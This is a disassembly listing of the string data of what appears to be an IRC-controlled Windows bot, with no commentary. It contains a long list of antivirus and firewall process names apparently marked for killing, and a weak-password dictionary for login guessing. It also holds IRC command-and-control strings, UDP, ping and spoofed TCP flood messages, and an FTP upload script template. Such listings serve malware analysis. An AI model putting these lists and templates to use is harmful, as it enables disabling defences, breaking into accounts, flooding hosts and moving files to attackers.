aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:0042B724�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:0042B720�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:0042B71C�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:0042B718�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:0042B714�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:0042B710�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:0042B70C�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:0042B708�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:0042B704�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:0042B700�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:0042B6FC�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:0042B6F8�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:0042B6F4�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:0042B6F0�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:0042B6EC�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:0042B6E8�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:0042B6E4�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:0042B6E0�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:0042B6DC�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:0042B6D8�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:0042B6D4�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:0042B6D0�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:0042B6CC�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:0042B6C8�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:0042B6C4�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:0042B6C0�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:0042B6BC�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:0042B6B8�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:0042B6B4�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:0042B6B0�o
align 10h
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:0042B6AC�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:0042B6A8�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:0042B6A4�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:0042B6A0�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:0042B69C�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:0042B698�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:0042B690�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:0042B68C�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:0042B688�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:0042B684�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:0042B680�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:0042B67C�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:0042B678�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:0042B674�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:0042B670�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:0042B66C�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:0042B668�o
align 10h
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:0042B664�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:0042B660�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:0042B65C�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:0042B658�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:0042B654�o
align 10h
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:0042B650�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:0042B64C�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:0042B648�o
; .data:0042B694�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:0042B644�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:0042B640�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:0042B638�o
; .data:0042B63C�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:0042B634�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:0042B630�o
align 10h
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:0042B62C�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:0042B628�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:0042B624�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:0042B620�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:0042B61C�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:0042B618�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:0042B614�o
align 10h
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:0042B610�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:0042B60C�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:0042B608�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:0042B604�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:0042B600�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:0042B5FC�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:0042B5F8�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:0042B5F4�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:0042B5F0�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:0042B5EC�o
align 10h
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:0042B5E8�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:0042B5E4�o
align 10h
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:0042B5E0�o
align 10h
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:0042B5DC�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:0042B5D8�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:0042B5D4�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:0042B5D0�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:0042B5CC�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:0042B5C8�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0042B5C0�o
; .data:0042B5C4�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:0042B5BC�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:0042B5B8�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:0042B5B4�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:0042B5AC�o
; .data:0042B5B0�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:0042B5A8�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:0042B5A4�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:0042B5A0�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:0042B59C�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:0042B598�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:0042B590�o
; .data:0042B594�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:0042B58C�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:0042B588�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:0042B584�o
align 10h
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:0042B580�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:0042B57C�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:0042B578�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:0042B574�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:0042B570�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:0042B56C�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:0042B568�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:0042B564�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:0042B560�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:0042B55C�o
align 10h
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:0042B558�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:0042B554�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:0042B550�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:0042B54C�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:0042B548�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:0042B544�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:0042B540�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:0042B53C�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:0042B538�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:0042B534�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:0042B530�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:0042B52C�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:0042B528�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:0042B524�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:0042B51C�o
; .data:0042B520�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:0042B518�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:0042B514�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:0042B510�o
align 10h
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:0042B50C�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:0042B508�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:0042B504�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:0042B500�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:0042B4FC�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:0042B4F8�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:0042B4F4�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:0042B4F0�o
align 10h
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:0042B4EC�o
align 10h
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:0042B4E8�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:0042B4E4�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:0042B4E0�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:0042B4DC�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:0042B4D8�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:0042B4D4�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .data:off_42B4D0�o
align 4
aCannotExtractP db 'Cannot extract process path for %s',0Ah,0 ; DATA XREF: sub_4081CA+2D7�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0Ah,0 ; DATA XREF: sub_4081CA+2C9�o
align 10h
aCouldNotDelete db 'Could not delete ',27h,'%s',27h,'.!',0Ah,0 ; DATA XREF: sub_4081CA+2BB�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4081CA+187�o
align 4
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_4084DD:loc_40855E�o
align 4
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_4084DD+7A�o
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_4084DD+2A�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0042C2F4�o
align 10h
aLan db 'lan',0 ; DATA XREF: .data:0042C2EC�o
aMain db 'main',0 ; DATA XREF: .data:0042C2E8�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:0042C2E4�o
aBlank db 'blank',0 ; DATA XREF: .data:0042C2E0�o
align 4
aOffice db 'office',0 ; DATA XREF: .data:0042C2DC�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0042C2D8�o
aXp db 'xp',0 ; DATA XREF: .data:0042C2D4�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .data:0042C2D0�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:0042C2CC�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:0042C2C8�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0042C2C4�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:0042C2C0�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:0042C2BC�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0042C2B8�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0042C2B0�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0042C2AC�o
align 10h
aSql db 'sql',0 ; DATA XREF: .data:0042C2A8�o
aSa db 'sa',0 ; DATA XREF: sub_4089DC+1877�o
; .text:00413B8B�o ...
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:0042C2A0�o
align 10h
aDb1 db 'db1',0 ; DATA XREF: .data:0042C298�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0042C294�o
align 4
aData db 'data',0 ; DATA XREF: .data:0042C290�o
align 10h
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0042C28C�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0042C288�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:0042C284�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0042C280�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0042C278�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0042C274�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0042C270�o
align 10h
aHello db 'hello',0 ; DATA XREF: .data:0042C26C�o
align 4
aHell_0 db 'hell',0 ; DATA XREF: .data:0042C268�o
align 10h
aGod db 'god',0 ; DATA XREF: .data:0042C264�o
aSex db 'sex',0 ; DATA XREF: .data:0042C260�o
aSlut db 'slut',0 ; DATA XREF: .data:0042C25C�o
align 10h
aBitch db 'bitch',0 ; DATA XREF: .data:0042C258�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0042C254�o
align 10h
aExchange db 'exchange',0 ; DATA XREF: .data:0042C250�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:0042C24C�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0042C248�o
align 10h
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0042C244�o
align 4
aLogin db 'login',0 ; DATA XREF: sub_4089DC+7B8�o
; .data:0042C240�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0042C23C�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:0042C238�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0042C230�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0042C22C�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0042C228�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:0042C224�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0042C220�o
aNeil db 'neil',0 ; DATA XREF: .data:0042C21C�o
align 10h
aLee db 'lee',0 ; DATA XREF: .data:0042C218�o
aBrian db 'brian',0 ; DATA XREF: .data:0042C214�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:0042C20C�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:0042C208�o
aSam db 'sam',0 ; DATA XREF: .data:0042C204�o
aLuke db 'luke',0 ; DATA XREF: .data:0042C200�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0042C1FC�o
; .data:0042C210�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0042C1F8�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042C1F4�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0042C1F0�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:0042C1EC�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0042C1E8�o
aJen db 'jen',0 ; DATA XREF: .data:0042C1E4�o
aBob db 'bob',0 ; DATA XREF: .data:0042C1E0�o
; .data:0042C234�o
aQwe db 'qwe',0 ; DATA XREF: .data:0042C1DC�o
aZxc db 'zxc',0 ; DATA XREF: .data:0042C1D8�o
aAsd db 'asd',0 ; DATA XREF: .data:0042C1D4�o
aQaz db 'qaz',0 ; DATA XREF: .data:0042C1D0�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0042C1CC�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0042C1C8�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042C1C4�o
align 10h
aWin2k db 'win2k',0 ; DATA XREF: .data:0042C1C0�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:0042C1BC�o
align 10h
aWindows db 'windows',0 ; DATA XREF: .data:0042C1B8�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042C1B4�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:0042C1B0�o
aOem db 'oem',0 ; DATA XREF: .data:0042C1AC�o
aUser db 'user',0 ; DATA XREF: sub_4089DC+1D42�o
; .data:0042C1A8�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0042C1A4�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0042C1A0�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:0042C19C�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0042C198�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0042C194�o
; .data:0042C2F0�o
align 10h
aWww db 'www',0 ; DATA XREF: .data:0042C190�o
aWeb db 'web',0 ; DATA XREF: .data:0042C18C�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0042C188�o
aMail db 'mail',0 ; DATA XREF: .data:0042C184�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0042C180�o
align 10h
aNull_0 db 'null',0 ; DATA XREF: .data:0042C17C�o
align 4
aServer db 'server',0 ; DATA XREF: sub_4089DC+1A05�o
; .data:0042C174�o
align 10h
aSystem db 'system',0 ; DATA XREF: .data:0042C170�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0042C168�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0042C164�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:0042C160�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0042C15C�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0042C158�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0042C150�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:0042C14C�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_4116D2+98�o
; .data:0042C148�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:0042C144�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0042C140�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:0042C13C�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0042C138�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:0042C134�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .data:0042C130�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0042C12C�o
a123456 db '123456',0 ; DATA XREF: .data:0042C128�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042C124�o
align 10h
a1234 db '1234',0 ; DATA XREF: .data:0042C120�o
align 4
a123 db '123',0 ; DATA XREF: .data:0042C11C�o
a12 db '12',0 ; DATA XREF: .data:0042C118�o
align 10h
a1: ; DATA XREF: .data:0042C114�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:0042C110�o
aPwd db 'pwd',0 ; DATA XREF: .data:0042C10C�o
aPass_0 db 'pass',0 ; DATA XREF: .data:0042C108�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042C104�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .data:0042C100�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0042C0FC�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0042C0F8�o
align 10h
aAdm db 'adm',0 ; DATA XREF: .data:0042C0F4�o
aDb2 db 'db2',0 ; DATA XREF: .data:0042C0D0�o
; .data:0042C29C�o
aOracle db 'oracle',0 ; DATA XREF: .data:0042C0CC�o
; .data:0042C2B4�o
align 10h
aDba db 'dba',0 ; DATA XREF: .data:0042C0C8�o
aDatabase db 'database',0 ; DATA XREF: .data:0042C0C4�o
; .data:0042C27C�o
align 10h
aDefault db 'default',0 ; DATA XREF: .data:0042C0C0�o
; .data:0042C16C�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:0042C0BC�o
; .data:0042C154�o
align 10h
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0042C0B8�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:0042C0B4�o
; .data:0042C2FC�o
aStudent db 'student',0 ; DATA XREF: .data:0042C0B0�o
; .data:0042C2F8�o
aOwner db 'owner',0 ; DATA XREF: .data:0042C0AC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0042C0A8�o
align 10h
aRoot db 'root',0 ; DATA XREF: .text:00413B92�o
; .data:0042C0A4�o ...
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0042C0A0�o
; .data:0042C300�o
align 10h
aAdmin db 'admin',0 ; DATA XREF: .text:00413B99�o
; .data:0042C09C�o ...
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:0042C098�o
; .data:0042C0EC�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .data:0042C094�o
; .data:0042C0E8�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042C090�o
; .data:0042C0E4�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0042C08C�o
; .data:0042C0E0�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:off_42C088�o
; .data:0042C0DC�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_42BFBC�o
align 4
a@celestial_org db '*@celestial.org',0 ; DATA XREF: .data:off_42BFB8�o
asc_425A4C: ; DATA XREF: sub_408601+129�o
; sub_408601+1AD�o
unicode 0, <|>,0
asc_425A50 db ' :',0 ; DATA XREF: sub_408601:loc_4086E1�o
; sub_4089DC+7D�o ...
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_408601+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_408601+38�o
align 4
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_40887D+9F�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+5CAF�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+5C9A�o
align 4
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_4089DC+5C86�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_4089DC+5C69�o
align 10h
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_4089DC+5BF1�o
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_4089DC+5BCE�o
align 10h
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_4089DC+5B8A�o
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_4089DC+5B7B�o
; sub_4089DC+5BE2�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_4089DC+5B67�o
align 4
asc_425BBC: ; DATA XREF: sub_4089DC+5B15�o
unicode 0, <~>,0
dword_425BC0 dd 0 ; DATA XREF: sub_4089DC+5B08�o
aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_4089DC+5AC5�o
align 4
aScanFailedTo_2 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_4089DC+587E�o
align 4
aStoppingPrevio db 'Stopping previous scans',0 ; DATA XREF: sub_4089DC+5843�o
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+561D�o
align 10h
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_4089DC+55B8�o
db 0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_4089DC+54F1�o
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+54C7�o
align 10h
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_4089DC+546C�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_4089DC:loc_40DD82�o
align 4
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+538A�o
align 4
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_4089DC+5324�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_4089DC+5316�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_4089DC+530F�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_4089DC+5260�o
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_4089DC+5254�o
; sub_4119EF+229�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_4089DC+5240�o
; sub_4119EF+209�o
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_4089DC:loc_40DB42�o
align 4
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_4089DC+515F�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_4089DC+5148�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_4089DC+512F�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_4089DC+510F�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_4089DC+50DC�o
align 4
